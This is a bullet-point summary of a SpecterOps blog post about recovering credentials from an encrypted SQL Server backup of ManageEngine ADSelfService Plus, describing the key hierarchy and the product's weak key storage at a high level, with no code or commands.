This blog post details a case study on recovering sensitive information from a SQL Server database backup of ManageEngine’s ADSelfService Plus. The author, a Service Architect at SpecterOps, explores the SQL Server encryption mechanisms and presents methods for decrypting database keys. Ultimately, the case reveals vulnerabilities in the product that allow for the recovery of privileged credentials.
Keypoints :
- The author is a Service Architect at SpecterOps with a focus on technology solutions for assessments.
- A SQL Server database backup from ManageEngine’s ADSelfService Plus was recovered, but it was encrypted.
- The task was to recover sensitive information with only a .bak file available.
- After extensive research, decryption keys and methods for attacking the encryption were identified.
- SQL Server’s encryption starts with the Service Master Key (SMK) and the Database Master Key (DMK).
- Key recovery involves using debugging tools and understanding SQL Server’s encryption APIs.
- The method revealed weaknesses in ManageEngine’s product regarding how it stored encryption keys.
- The blog discusses brue-forcing techniques for recovering DMK passwords stored in the database backup.
- A vulnerable hardcoded example password provided in Microsoft documentation was discovered in the database.
- The findings suggest that strong security practices are not implemented in this product, allowing sensitive data to be decrypted easily.
- Lessons emphasized include validating product security in a lab environment before conducting serious research.
- This blog post was presented at SOCON 2025, highlighting its relevance in the security community.
Full Story: https://posts.specterops.io/the-sql-server-crypto-detour-5ff9ac7033de?source=rss—-f05f8696e3cc—4